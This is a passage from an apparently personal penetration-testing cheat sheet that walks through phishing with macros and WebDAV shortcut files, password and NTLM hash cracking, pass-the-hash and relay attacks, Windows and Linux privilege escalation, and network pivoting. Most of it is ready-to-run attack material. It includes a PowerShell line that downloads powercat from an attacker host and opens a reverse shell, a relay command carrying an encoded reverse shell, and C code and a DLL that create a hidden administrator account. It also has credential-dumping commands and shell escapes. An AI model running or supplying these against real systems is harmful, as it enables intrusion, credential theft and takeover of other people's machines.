 356 | Next, with a simple GET request like `/tmp/cmd=whoami` we can execute commands on the webserver.
 357 | 
 358 | 
 359 | ## SQLMAP
 360 | Finally, we can use something that automates the SQL exploits, like **sqlmap**. With this tool we can have automatic scan and checks for any type of vulnerability on the webserver using SQL and It can also automatically upload **reverse shells** to the server. For more information check directly the project documentation https://github.com/sqlmapproject/sqlmap. A basic usage of sqlmap could be the following code
 361 | 
 362 | ```bash
 363 | sqlmap -u 'http://<target>/page.php?user=test' -p user
 364 | ```
 365 | 
 366 | ## Client Side Attacks
 367 | A Client Side Attack is an attack executed on client side. It could be in the victim's browser or in the victim's computer through malicious executables. This is usually a two-steps attack. In the first step usually we deploy the payload to the victim infrastructure using social engineer and OSINT. After the victim double-clicked the malicious file we sent or opened the malicious link, we can execute arbitrary code for any sort of action we want to do. The aim of Client Side Attacks is to gain an initial foothold in a non-routable internal network.
 368 | 
 369 | ## Exploiting Windows Users with VBA Macros
 370 | We can craft a malicious Word file is very easy, Microsoft offers a very good guide to do it :) https://support.microsoft.com/it-it/office/creare-o-eseguire-una-macro-c6b99036-905c-49a6-818a-dfb98b7c3c9c. Inside the macro section we can insert a malicious reverse shell using https://github.com/glowbase/macro_reverse_shell that is a useful tool to craft fixed-size strings supported by Microsoft Macros.
 371 | On client side we open the reverse shell with 
 372 | ```bash
 373 | nc -lvp <PORT>
 374 | ```
 375 | 
 376 | ## Exploiting Windows Users with WebDav mounts
 377 | With Windows libraries we can craft client-side attacks on Windows. We can serve this configuration for a WebDav mount on the victim's computer. First we start or WebDav listener in the Kali machine with
 378 | 
 379 | ```bash
 380 | wsgidav --host=0.0.0.0 --port=80 --auth=anonymous --root .
 381 | ```
 382 | 
 383 |  We can craft the following `config.Library-ms` file.
 384 | 
 385 | ```xml
 386 | <?xml version="1.0" encoding="UTF-8"?>
 387 | <libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
 388 | <name>@windows.storage.dll,-34582</name>
 389 | <version>6</version>
 390 | <isLibraryPinned>true</isLibraryPinned>
 391 | <iconReference>imageres.dll,-1003</iconReference>
 392 | <templateInfo>
 393 | <folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
 394 | </templateInfo>
 395 | <searchConnectorDescriptionList>
 396 | <searchConnectorDescription>
 397 | <isDefaultSaveLocation>true</isDefaultSaveLocation>
 398 | <isSupported>false</isSupported>
 399 | <simpleLocation>
 400 | <url>http://<ATTACKER-IP></url>
 401 | </simpleLocation>
 402 | </searchConnectorDescription>
 403 | </searchConnectorDescriptionList>
 404 | </libraryDescription>
 405 | ```
 406 | 
 407 | Then we can upload to the WebDAV a malicious **Windows Shortcut** file (lnk file) that points to the attacker malicious ip that servers a malicious exe for a reverseshell, like [powercat](https://github.com/besimorhino/powercat). In this section, a simple reverse shell won't work, but we have to use some webserver (like python webserver) with the executable available. Something like that could work for Windows 10/11
 408 | ```powershell
 409 | powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString('http://ATTACKER-IP:WEBPORT/powercat.ps1');
 410 | powercat -c ATTACKER-IP-NETCAT -p NETCAT-PORT -e powershell"
 411 | ```
 412 | 
 413 | We copy inside the WebDAV the the link of the powershell command previously created and also the **config-Library.ms** file that we will send to the victim as the payload (via MAIL, SMB, etc...).
 414 | 
 415 | with our netcat listener on the attacker side.
 416 | ```bash
 417 | nc -lvp NETCAT-PORT
 418 | ```
 419 | # Finding Exploits
 420 | ## Resources
 421 | Mainly there are two locations where you can find exploits. **Make sure you run exploits ONLY AFTER have read the code.**
 422 | ```html
 423 | https://www.exploit-db.com/
 424 | https://www.metasploit.com/
 425 | ```
 426 | Or inside the Linux installation of NMAP at `/usr/share/nmap/scripts`.
 427 | 
 428 | # Password Attacks
 429 | We can bruteforce logins with Password Attack metodology. This type of attacks uses a dictionary of usernames/passwords and tries to guess the credentials in the applications. It could be HTTPS, SSH, RDP etc...
 430 | 
 431 | ## Hydra
 432 | A very good tool for password bruteforcing is hydra.
 433 | 
 434 | ### SSH
 435 | The following attack uses the wordlist.txt file to bruteforce the admin user for SSH login.
 436 | 
 437 | ```bash
 438 | hydra -L admin -P wordlist.txt <target-ip> ssh -t 4
 439 | ```
 440 | If the password is know, It could be used the tecnique **password spraying** where the passwords remain constant and the username is bruteforced. This is useful if we gain passwords from a dataleak.
 441 | 
 442 | ### RDP
 443 | A RDP attack could be this
 444 | 
 445 | ```bash
 446 | hydra -L Administrator -P wordlist.txt <target-ip> rdp -t 4
 447 | ```
 448 | 
 449 | ### HTTP Basic Auth
 450 | This works with HTTP basic auth protocol
 451 | 
 452 | ```bash
 453 | hydra -l admin -P rockyou.txt <target-ip> http-get
 454 | ```
 455 | 
 456 | ## Cracking Password
 457 | With John and Hashcat we can craft customized mutating wordlist that let us modify the original wordlist while executing. In the [Hashcat Wiki](https://hashcat.net/wiki/doku.php?id=rule_based_attack) are shown all possible combinations for password mutation. For example, the following rule capitalizes each first letter and adds `1` and then `!` for each word.
 458 | 
 459 | ```txt
 460 | c $1
 461 | c $!
 462 | ```
 463 | 
 464 | For a wordlist with the single word `test`, this will create the following mutated wordlist
 465 | 
 466 | ```txt
 467 | Test1
 468 | Test!
 469 | ```
 470 | 
 471 | The attack will be the following
 472 | 
 473 | ```bash
 474 | hashcat --wordlist=/usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/my-rule.rule user.hash
 475 | ```
 476 | 
 477 | ## KeePass file
 478 | If we dump a KeePass Database (Database.kdbx), we can try to crack it with
 479 | 
 480 | ```bash
 481 | keepass2john Database.kdbx > keepass.hash
 482 | ```
 483 | First we remove the "Database:" string from the hash, then we run our attack. The **13400** is the code for Hashcat to crack KeePass hashes.
 484 | 
 485 | ```bash
 486 | hashcat -m 13400 keepass.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule --force
 487 | ```
 488 | 
 489 | ## SSH Keys 
 490 | If we find a SSH Key password protected we can use
 491 | 
 492 | ```bash
 493 | ssh2john id_rsa > id_rsa.hash
 494 | ```
 495 | 
 496 | We remove the filename at the beginning of the hash, as in the KeePass section and we use JohnTheRipper to crack the hash, but first we add our hashcat rules to the John configuration rules (if we want to use custom rules)
 497 | 
 498 | ```bash
 499 | cat /home/kali/passwordattacks/my-rule.rule >> /etc/john/john.conf
 500 | ```
 501 | 
 502 | And then the attack is run with
 503 | 
 504 | ```bash
 505 | john --wordlist=ssh.passwords --rules=sshRules id_rsa.hash
 506 | ```
 507 | 
 508 | Now we can login with the SSH key and we can use the cracked passphrase.
 509 | 
 510 | ## NTLM Hashes
 511 | The NTLM hash is the cryptographic format in which user passwords are stored on Windows systems. NTLM hashes are stored in the SAM (security account manager) or NTDS file of a domain controller. They are a fundamental part of the mechanism used to authenticate a user through different communications protocols. It’s, therefore, critical information and highly sought after by hostile actors when trying to unleash a cyber-attack. When pentesting, for example, it’s common for attackers to try to obtain these hashes (using tools such as pwdump or mimikatz) and use Pass The Hash techniques using NTLM hashes to exploit the privileges of one or more systems. In this way, they could execute elevated privileges and even execute commands. The NTLM hash is encoded by taking the user’s password and converting it into a 16-byte key using an MD4 hash function. This key is divided into two halves of 8 bytes each, which are used as input to three rounds of DES encryption to generate a 16-byte output that represents the NTLM hash. Each DES round uses an 8-byte key derived from the original key half using a parity operation. The two 8-byte results from the three DES rounds are concatenated to form the 16-byte NTLM hash that is used to verify the user’s password in the Windows operating system. NTLM hashes are likely to be used in many Windows authentication attacks, so it’s advisable to limit their use and use Kerberos. <!-- https://www.tarlogic.com/cybersecurity-glossary/ntlm-hash/ -->
 512 | 
 513 | ### Mimikatz
 514 | [Mimikatz](https://github.com/ParrotSec/mimikatz) is a very useful tool that can do many things once executed on a Windows system, like dumping NTML hashes of the users. As their Github page says, it can be run with
 515 | 
 516 | ```powershell
 517 | .\mimikatz.exe
 518 | ```
 519 | Warning: Mimikatz's commands could not work depending on the Windows version. Make sure to download the correct version after checking with `systeminfo` the Windows version.
 520 | 
 521 | Then, if we have the privileges, it can be used to dump NTLM hashes with
 522 | 
 523 | ```powershell
 524 | privilege::debug
 525 | token::elevate
 526 | lsadump::sam
 527 | ```
 528 | 
 529 | To impersonate another user
 530 | 
 531 | ```powershell
 532 |  sekurlsa::pth /user:Administrator /domain:<DOMAI> /ntlm:<NTLM-HASH> /impersonate
 533 |  ```
 534 | 
 535 | ### Cracking the NTLM hashes
 536 | The **1000** code is for NTLM hashes. The username is dump along with the hash. The cracking is done with the following code
 537 | 
 538 | ```bash
 539 | hashcat -m 1000 user.hash /usr/share/wordlists/rockyou.txt
 540 | ```
 541 | 
 542 | The plaintext credential we will find are used in the authentication method in the Windows system, like RDP, SMB or other services, if the user has the required privileges to use that services.
 543 | 
 544 | ### Passing the NTLM hashes
 545 | The NTLM hashe can be used also as is if the protocol supports it. An example is SMB
 546 | 
 547 | ```bash
 548 | smbclient \\\\<TARGET-IP>\\secrets -U Administrator --pw-nt-hash <NTLM-HASH>
 549 | ```
 550 | 
 551 | We can escalate the writables shares with `impacket-psexec`, a oneliner tool that opens a reverse shell with the exploited target.
 552 | 
 553 | ```bash
 554 | impacket-psexec -hashes 00000000000000000000000000000000:<NTLM-HASH> Administrator@<TARGET-IP>
 555 | ```
 556 | 
 557 | ### Cracking the Net-NTLMv2 hashes
 558 | One of the authentication protocols Windows machines use to authenticate across the network is a challenge / response / validation called Net-NTLMv2. If can get a Windows machine to engage my machine with one of these requests, we can perform an offline cracking to attempt to retrieve their password. In some cases, we could also do a relay attack to authenticate directly to some other server in the network. <!-- https://0xdf.gitlab.io/2019/01/13/getting-net-ntlm-hases-from-windows.html -->
 559 | 
 560 | Once identified our interface, we can start our interceptor with
 561 | 
 562 | ```bash
 563 | sudo responder -I <INTERFACE>
 564 | ```
 565 | 
 566 | And from the Victim we only need to mount as a SMB share a fake provided path
 567 | 
 568 | ```powershell
 569 | dir \\<ATTACKER-IP>\test
 570 | ```
 571 | 
 572 | In this way `responder` will dump the hash that could be cracked with code **5600** on hashcat
 573 | 
 574 | ```bash
 575 | hashcat -m 5600 user.hash /usr/share/wordlists/rockyou.txt --force
 576 | ```
 577 | 
 578 | ### Relaying the Net-NTLMv2 hashes
 579 | We can perform a `ntlmrelayx` attack if the gained hash is too difficult to be cracked. In this case the `<TARGET-IP>` is the second exploitable machine on the network.
 580 | 
 581 | ```bash
 582 | impacket-ntlmrelayx --no-http-server -smb2support -t <TARGET-IP> -c "powershell -enc <ENCODED-REVSHELL>"
 583 | ```
 584 | 
 585 | The encoded reverse shell can be crafted with some UTF16-BE malicious code crafted with https://www.revshells.com.
 586 | Then, we have to gain the hash from the first machine. 
 587 | We can do the same attack as before, mounting on the machine 1 the fake SMB share, in order to gain the hash.
 588 | 
 589 | ```powershell
 590 | dir \\<ATTACKER-IP>\test
 591 | ```
 592 | 
 593 | Now we `impacket-ntlmrelayx` will pass the hash to the second machine to authenticate us with the same hash. If the user is also the Administrator of the second machine, we will be logged as Administrator.
 594 | 
 595 | # Privilege Escalation
 596 | 
 597 | ## Windows Privilege Escalation
 598 | We can use [Seatbelt](https://github.com/GhostPack/Seatbelt.git) and [WinPeas](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS) and then investigate on the results. It is also useful to check Powershell history and `Windows Event Viewer`. 
 599 | If the result for Windows doesn't display colors, add this REG value
 600 | 
 601 | ```powershell
 602 |  REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1 
 603 | ```
 604 | 
 605 | ## Enumeration
 606 | As always, enumerate all the possible things, login to SMB/SSH/Other services with default userames ad passwords or perform a _null login_ as the following
 607 | 
 608 | For rpcclient
 609 | 
 610 | ```bash
 611 | rpcclient 10.10.10.192 -U""
 612 | ```
 613 | 
 614 | For for smbclient
 615 | 
 616 | ```bash
 617 | smbclient -L 10.10.10.192 -U""
 618 | ```
 619 | 
 620 | ## Service Binary Hijacking
 621 | ### PowerUp
 622 | Another useful tool to check privilege escalation vector is [PowerUp](https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1). We can upload it on the victim's machine and then use it to gain knowledge and exploit the privileges misconfiguration on the services.
 623 | First, we enable the powershell scripting capability.
 624 | 
 625 | ```powershell
 626 | powershell -ep bypass
 627 | ```
 628 | 
 629 | Then we enable PowerUp
 630 | 
 631 | ```powershell
 632 | . .\PowerUp.ps1
 633 | ```
 634 | 
 635 | To list modifiable service we use
 636 | 
 637 | ```powershell
 638 | Get-ModifiableServiceFile
 639 | ```
 640 | 
 641 | Once we spot an interesting service, we can try to abuse it with
 642 | 
 643 | ```powershell
 644 | Install-ServiceBinary -Name '<SERVICENAME>'
 645 | ```
 646 | 
 647 | This will create the admin user `john` with password `Password123!`. To log-in with the created user we can restart the service (if we have the correct permissions and PowerUp.ps1 automatically uses the right arguments). Eventuall we can restart the machine in order to have all services restarted.
 648 | We also must notice that if the service requrie some additional configurations, for example passing a configuration file, the PowerUp.ps1 script will fail and we must exploit manually the privilege escalation, setting the right path to the configurations of the service (eg: mysql).
 649 | 
 650 | If we have to manually load a custom exploit into the service we can directly write the C code and compile it for our needs
 651 | 
 652 | ```c
 653 | #include <stdlib.h>
 654 | 
 655 | int main ()
 656 | {
 657 |   int payload;
 658 |   
 659 |   payload = system ("net user john Password123! /add");
 660 |   payload = system ("net localgroup administrators john /add");
 661 |   
 662 |   return 0;
 663 | }
 664 | ```
 665 | 
 666 | And then compile it with
 667 | 
 668 | ```bash
 669 | x86_64-w64-mingw32-gcc payload.c -o payload.exe
 670 | ```
 671 | 
 672 | ## Service DLL Hijacking
 673 | DLL are the specular 'Shared Object' on Linux. They are libraries that provide functionalities for executable programs. With the program [Process Monitor](https://learn.microsoft.com/en-us/sysinternals/downloads/procmon) we can monitor program calls. If we find that a program calls a DLL that is missing, it may be replaced (if we have the correct read/write permissions) by our malicious DLL. We can craft the DLL following [Microsoft's guidelines](https://learn.microsoft.com/it-it/troubleshoot/windows-client/deployment/dynamic-link-library) and insert into the case `DLL_PROCESS_ATTACHED` our code. The code can be similar to the previous code for the manual privilege escalation using Windows services. 
 674 | 
 675 | This is the order Windows search for DLLs
 676 | 
 677 | ```
 678 | 1. The directory from which the application loaded.
 679 | 2. The system directory.
 680 | 3. The 16-bit system directory.
 681 | 4. The Windows directory. 
 682 | 5. The current directory.
 683 | 6. The directories that are listed in the PATH environment variable.
 684 | ```
 685 | 
 686 | The following C program can be used to exploit a missing DLL
 687 | 
 688 | ```c
 689 | #include <stdlib.h>
 690 | #include <windows.h>
 691 | 
 692 | BOOL APIENTRY DllMain(
 693 | HANDLE hModule,// Handle to DLL module
 694 | DWORD ul_reason_for_call,// Reason for calling function
 695 | LPVOID lpReserved ) // Reserved
 696 | {
 697 |     switch ( ul_reason_for_call )
 698 |     {
 699 |         case DLL_PROCESS_ATTACH: // A process is loading the DLL.
 700 |         int payload;
 701 |         payload = system ("net user john Password123! /add");
 702 |         payload = system ("net localgroup administrators john /add");
 703 |         break;
 704 |         case DLL_THREAD_ATTACH: // A process is creating a new thread.
 705 |         break;
 706 |         case DLL_THREAD_DETACH: // A thread exits normally.
 707 |         break;
 708 |         case DLL_PROCESS_DETACH: // A process unloads the DLL.
 709 |         break;
 710 |     }
 711 |     return TRUE;
 712 | }
 713 | 
 714 | ```
 715 | 
 716 | We will then compile it on the linux machine with the `--shared` option and we load it in the Windows machine **in the path and with the name that Windows expect the DLL to have**. Obviously this works only if we have the **WRITE** permission on that files.
 717 | 
 718 | ```bash
 719 | x86_64-w64-mingw32-gcc calledDll.cpp --shared -o calledDll.dll
 720 | ```
 721 | 
 722 | Trasnfer the file and restart the service with
 723 | 
 724 | ```powershell
 725 | Restart-Service <SERVICENAME>
 726 | ```
 727 | 
 728 | And we will be able to execute a shell as admin with the user john. We could not be able to log-in via RDP because the user may not be in the RDP group.
 729 | 
 730 | ## Unquoted Service Paths
 731 | When a service is created whose executable path contains spaces and isn’t enclosed within quotes, leads to a vulnerability known as Unquoted Service Path which allows a user to gain SYSTEM privileges (only if the vulnerable service is running with SYSTEM privilege level which most of the time it is). In Windows, if the service is not enclosed within quotes and is having spaces, it would handle the space as a break and pass the rest of the service path as an argument. <!-- https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae -->
 732 | 
 733 | We find unquoted paths with the command
 734 | 
 735 | ```powershell
 736 | wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """
 737 | ```
 738 | 
 739 | We must check if we have write permissions on the executable in order to replace it with a new one.
 740 | 
 741 | ```powershell
 742 | icacls "C:\Program Files\Enterprise Apps\path\to\service.exe"
 743 | ```
 744 | 
 745 | Then if we have permission on the service we can start or stop it with `Start-Service` or `Stop-Service` command. Once we got the paths we can use PowerUp.ps1 for exploting the service. This means the service will be replaced with a malicious exe.
 746 | 
 747 | ```powershell
 748 | Get-UnquotedService
 749 | powershell -ep bypass
 750 | . .\PowerUp.ps1
 751 | ```
 752 | 
 753 | And finally we run the command to overwrite the service with
 754 | 
 755 | ```powershell
 756 | Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Enterprise Apps\Current.exe"
 757 | ```
 758 | 
 759 | Now restarting the service will grant us an Administrator account with user john and Password123! as credentials
 760 | 
 761 | ```powershell
 762 | Restart-Service GammaService
 763 | ```
 764 | 
 765 | ## Scheduled Tasks
 766 | If a task is executed periodically, we can exploit the called program if we have write permissions on it. To seek for scheduled tasks we can run.
 767 | 
 768 | ```powershell
 769 | schtasks /query /fo LIST /v
 770 | ```
 771 | 
 772 | Eventually we can use `findstr` if we want to search for something specific. After that we can replace the program with a simple .exe that creates a new admin user.
 773 | 
 774 | ## Windows Services
 775 | We can watch status of Windows services with [Watch-Command](https://github.com/markwragg/PowerShell-Watch/tree/master)
 776 | 
 777 | ## Exploits
 778 | We can use multiple exploits for Windows, depending on the privileges we got on the system. An example could be [PrintSpoofer](https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe). We could serve it on the victim machine. If we have `SeImpersonatePrivilege` privilege displayable with `whoami /priv` we could gain Admin privileges with
 779 | 
 780 | ```powershell
 781 | .\PrintSpoofer64.exe -i -c powershell.exe
 782 | ```
 783 | 
 784 | There is a wide range of this exploits. We can use the whole [Potato Family](https://jlajara.gitlab.io/Potatoes_Windows_Privesc) and perform a Privilege Escalation. A real-life scenario of a Windows privilege escaltion could be exploiting the [`SeBackupPrivilege`](https://juggernaut-sec.com/sebackupprivilege).
 785 | 
 786 | ## Extracting a Copy of the SAM and SYSTEM Files Using reg.exe
 787 | After having gained the Administrator access we cam dump SAM and SYSTEM using reg.exe 
 788 | 
 789 | ```powershell
 790 | reg save hklm\sam C:\temp\SAM
 791 | reg save hklm\system C:\temp\SYSTEM
 792 | ```
 793 | 
 794 | Once copied back on the Kali machine the two files we can dump them with
 795 | 
 796 | ```bash
 797 | impacket-secretsdump -sam SAM -system SYSTEM LOCAL
 798 | ```
 799 | 
 800 | or
 801 | 
 802 | ```bash
 803 | samdump2 SYSTEM SAM
 804 | ```
 805 | 
 806 | This will give us a list of userame:hash that can be cracked using hashcat's NTLM cracking or used for a Pass The Hash attack. Other ways to perform a SAM and SYSTEM credential dumping are explained [here](https://juggernaut-sec.com/dumping-credentials-sam-file-hashes/). 
 807 | Many scenarios about dumping SAM ad SYSTEM can be found [here](https://www.hackingarticles.in/credential-dumping-sam/).
 808 | 
 809 | ## UAC Bypass
 810 | Due to unsafe .Net Deserialization we can exploit the system using [UAC Bypass](https://github.com/CsEnox/EventViewer-UACBypass).
 811 | ```powershell
 812 | PS C:\Windows\Tasks> Import-Module .\Invoke-EventViewer.ps1
 813 | 
 814 | PS C:\Windows\Tasks> Invoke-EventViewer 
 815 | [-] Usage: Invoke-EventViewer commandhere
 816 | Example: Invoke-EventViewer cmd.exe
 817 | 
 818 | PS C:\Windows\Tasks> Invoke-EventViewer cmd.exe
 819 | [+] Running
 820 | [1] Crafting Payload
 821 | [2] Writing Payload
 822 | [+] EventViewer Folder exists
 823 | [3] Finally, invoking eventvwr
 824 | ```
 825 | 
 826 | ### Additional Tips for Windows PE
 827 | Always check installed programs under `C:\Program Files(x86)` or under folders as `Downloads` or `Documents`. We can find exploitable programs (search the program name with searchsploit) or interesting files like Keypass vaults or hashed credentials to be cracked.
 828 | Additioally, if we find some non-standard executable program that requires some sort of credentials for it, just do a `strings fileame.exe` because the credentials may be hardcoded into it.
 829 | 
 830 | ## Linux Privilege Escalation
 831 | We can use many tools like [unix-privesc-check](https://github.com/pentestmonkey/unix-privesc-check) or [linPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) and [LinEnum](https://github.com/rebootuser/LinEnum) to perform an analysis on the possibile privilege escalation vectors on a unix system.
 832 | 
 833 | ### Crunch
 834 | We can perform a password list creation with [Crunch](https://github.com/jim3ma/crunch).
 835 | 
 836 | ## Commond abused binaries
 837 | We can use the [GTFOBins](https://gtfobins.github.io/gtfobins/) to read existent exploitations for binaries in linux. Below more examples.
 838 | 
 839 | ### SETUID
 840 | #### find
 841 | find utils can be abused and can execute a shell. We use `-p` to preventing the effective user from being reset. 
 842 | 
 843 |  ```bash
 844 | find /home/joe/Desktop -exec "/usr/bin/bash" -p \;
 845 |  ```
 846 | 
 847 | #### gdb
 848 |  ```bash
 849 | /usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit
 850 |  ```
 851 | 
 852 | #### cp
 853 |  ```bash
 854 | LFILE=file_to_change
 855 | /usr/bin/cp --attributes-only --preserve=all ./cp "$LFILE"
 856 |  ```
 857 | #### gawk
 858 |  ```bash
 859 | /usr/bin/gawk 'BEGIN {system("/bin/sh")}'
 860 |  ```
 861 | ### VISUDO
 862 | In the file `/etc/sudoers` the sysadmin can specify which commands the users can run with the "sudo" keyword that can be used to run the command with elevated privileges. This could led to a many exploit tecniques that we can find referring to GTFObins. Normally users that can run "sudo" are the users listed in the `sudo group`.
 863 | 
 864 | ### VI / VIM
 865 | VI and VIM are often misconfigured and users are allowed to use them with sudo. A common way to exploit the bad configuration is the following. 
 866 | This exploit let the user call the vi/vim executable as required in the visudo file (`sudo -l` to see the user sudo permission).
 867 | ```bash
 868 | sudo vi /ALLOWED/PATH
 869 | :set shell=/bin/sh
 870 | :shell
 871 | ```
 872 | 
 873 | ### LXD
 874 | To perform pviesc when part of lxd group an interesting exploit description is available [here](https://www.hackingarticles.in/lxd-privilege-escalation/). 
 875 | 
 876 | #### apt
 877 |  ```bash
 878 | sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
 879 |  ```
 880 | 
 881 | #### gcc
 882 |  ```bash
 883 | sudo gcc -wrapper /bin/sh,-s .
 884 |  ```
 885 | 
 886 | ## System Investigation 
 887 | To get all capabilities on file in the system we can use the following commands, also grepping for a specific capability.
 888 | 
 889 |  ```bash
 890 | /usr/sbin/getcap -r / 2>/dev/null
 891 | /usr/sbin/getcap -r / 2>/dev/null | grep -i setuid
 892 |  ```
 893 | 
 894 | ## Searchexploit for Privilege Escalation
 895 | There are many exploits for many linux kernel versions out there. We can check the OS Version with cat /etc/os-release. Famous examples of Linux kernel exploits are [DirtyCow](https://dirtycow.ninja/) or [DirtyPipe](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits). There is also a recent exploit on the GNU C Library [Looney Tunables](https://github.com/hadrian3689/looney-tunables-CVE-2023-4911) that can work on newer systems as a privilege escalation. An interesting and recent case is the Pkexec Local Privilege Escalation exploit that can be run with [PwnKit](https://github.com/ly4k/PwnKit). Many of this exploits can be found directly with `searchsploit`.
 896 | 
 897 | ### linPEAS oneliner
 898 | 
 899 |  ```bash
 900 | curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
 901 |  ```
 902 | 
 903 | ## Port Forwarding
 904 | Port forwarding is a tecnique that let one machine "bridge" his connection between two networks. In a case where we want to access to the machine B (a database) that is connected to the machine A (a virtual machine) that is connected to the WAN, we want first to exploit and access the machine A in order to reach the second machine, routable only through the network in which there is the machine A.
 905 | 
 906 | ### Socat
 907 | Socat is a useful tool for Port Forwarding. Let's start it in verbose mode with
 908 | 
 909 |  ```bash
 910 | socat -ddd TCP-LISTEN:<KALI-PORT>,fork TCP:<TARGET-MACHINE>:<TARGET-PORT>
 911 |  ```
 912 | 
 913 | Next we will connect to it from the Kali VM with the postgresql client that we have only on the kali machine.
 914 | 
 915 |  ```bash
 916 | psql -h <TARGET-IP> -p <TARGET-PORT> -U postgres
 917 |  ```
 918 | 
 919 | For an SSH forwarding we can use 
 920 | 
 921 |  ```bash
 922 | socat -ddd TCP-LISTEN:22,fork TCP:<TARGET-MACHINE>:2222
 923 |  ```
 924 | 
 925 | And then we can connect to it via
 926 | 
 927 |  ```bash
 928 | ssh user@<TARGET-IP> -p <TARGET-PORT>
 929 |  ```
 930 | 
 931 | An useful pre-compiled binary for Windows is [socat-1.7.3.0.exe](https://github.com/tech128/socat-1.7.3.0-windows/tree/master). It has to be run in the folder with all the DLL files. In this way we get a port forwarding from an exploited Windows machine to our Kali machine, and we can connect to the network the Windows machine is connected to.
 932 | 
 933 |  ```powershell
 934 | .\socat.exe TCP-LISTEN:2222, TCP:192.168.45.223:4444
 935 |  ```
 936 | 
 937 | An example of revshell for this scenario is
 938 | 
 939 |  ```powershell
 940 | nc.exe <IP> 2222 -e powershell
 941 |  ```
 942 | 
 943 | ## SSH Tunneling
 944 | In cases where socat is not present on the target machine we can still use the SSH tunneling functionality. Port forwarding can be of different types.
 945 | 
 946 | ### Local Port Forwarding
 947 | In this case we run the command on the **TARGET** that becames the "forwarder" between **KALI** and the **IP-B**. This is useful to directly connect **KALI** to the **IP-B** machine, through the connection forwarded from **TARGET** to **IP-A**. The 
 948 | 
 949 |  ```bash
 950 | ssh -N -L 0.0.0.0:<LOCAL-PORT>:<IP-B>:<REMOTE-PORT> user@<IP-A>
 951 |  ```
 952 | 
 953 |  ```
 954 | 
 955 | KALI ----- TARGET ----- IP-A ----- IP-B [REMOTE-PORT]
 956 |  |________________________||__________|
 957 | 
 958 | ```
 959 | 
 960 | ### Dynamic Port Forwarding
 961 | This lets us forward all ports to the **KALI** machine through the connection forwarded from **TARGET** to **IP-A**. It is useful when we want to perform a network scan and in the IP-A machine there isn't the NMAP binary.
 962 | 
 963 |  ```bash
 964 | ssh -N -D 0.0.0.0:<LOCAL-PORT> user@<IP-B>
 965 | ```
 966 | 
 967 | ```
 968 |      
 969 | KALI ----- TARGET ----- IP-A ----- IP-B [ALL PORTS]
 970 |  |________________________||__________|
 971 | 
 972 | ```
 973 | 
 974 | To use commands we must pass through the SOCKS5 protocol, with the `proxychains` client. This client will forward all traffic to the proxy on the ssh listening port. In this way all the traffic will go through this connection. An example of the usage of proxychains for an nmap scan of the victim's subnet is the following:
 975 | 
 976 |  ```bash
 977 | proxychains nmap -sV -A -O 192.168.1.0/24
 978 | ```
 979 | 
 980 | Proxychain configuration at `/etc/proxychains.conf` must be configured
 981 | 
 982 |  ```bash
 983 | [ProxyList]
 984 | socks5 <IP-B> <LOCAL-PORT>
 985 |  ```
 986 | 
 987 | ### Remote Port Forwarding
 988 | It is more common for firewalls and network administration rules to have only filtering in the inbound traffic, but less filtering on the outbound connections. We can use Remote Port Forwarding to mitigate this defense. The following command is a Remote Port Forwarding from the Kali machine serving the SSH on port LOCAL-PORT and forwarding all the connections to the IP-B on the REMOTE-PORT
 989 | 
 990 |  ```bash
 991 | ssh -N -R 127.0.0.1:<LOCAL-PORT>:<IP-B>:<REMOTE-PORT> kali@<KALI-IP>
 992 |  ```
 993 | 
 994 | ```
 995 |     RECEIVED AS OUTBOUND
 996 |  |¯¯¯¯¯¯¯¯¯¯¯>¯¯¯¯¯¯¯¯¯¯¯¯¯|      
 997 | KALI ----- TARGET ----- IP-A ----- IP-B [REMOTE PORT]
 998 |  |___________<____________||_________|
 999 |           OUTBOUND
1000 | ```
1001 | 
1002 | ### Remote Dynamic Port Forwarding
1003 | This, similar to the Local Dynamic port forwarding lets through the usage of `proxychains` to connect to the <IP-B> on all ports, based redirecting the traffic from the IP-A to the Kali machine on the <LOCAL-PORT> 
1004 | 
1005 |  ```bash
1006 | ssh -N -R <LOCAL-PORT> kali@<KALI-IP>
1007 | ```
1008 | 
1009 | ```
1010 |     RECEIVED AS OUTBOUND
1011 |  |¯¯¯¯¯¯¯¯¯¯¯>¯¯¯¯¯¯¯¯¯¯¯¯¯|      
1012 | KALI ----- TARGET ----- IP-A ----- IP-B [ALL PORTS]
1013 |  |___________<____________||_________|
1014 |           OUTBOUND
1015 | ```
1016 | 
1017 | ### SSHUTTLE
1018 | This tools works like a VPN and routes our traffic through the SSH listener we spin on a server. First we have to set up `SOCAT` to listen in the <LOCAL-PORT>, then we can scan the network simply using a normal NMAP.
1019 | 
1020 |  ```bash
1021 | socat TCP-LISTEN:<LOCAL-PORT>,fork TCP:<REMOTE-IP>:<REMOTE-PORT>
1022 | ```
1023 | 
1024 | Next we run sshuttle specifying the subnets we want to be forwarded through the ssh connection
1025 | 
1026 |  ```bash
1027 | sshuttle -r database_admin@<REMOTE-IP>:<LOCAL-PORT> <SUBNET-1> <SUBNET-2>
1028 |  ```
1029 | 
1030 | Now, an NMAP on SUBNET-1 will work as we were in the same network.
1031 | 
1032 | ### PLINK
1033 | Plink is the CLI version of PuTTY that allow us to use SSH Remote Forwarding if the OpenSSH service is missing. The syntax specifies the LOCAL-PORT on which Kali will listen and the REMOTE-PORT the Windows Machine will forward the connection to. This is useful in scenarios in which we have access only through CLI on the Windows Machine 1 and we want to connect via RDP to the Windows Machine 2, reachable only from the first Windows Machine.
1034 | 
1035 | ```
1036 | 
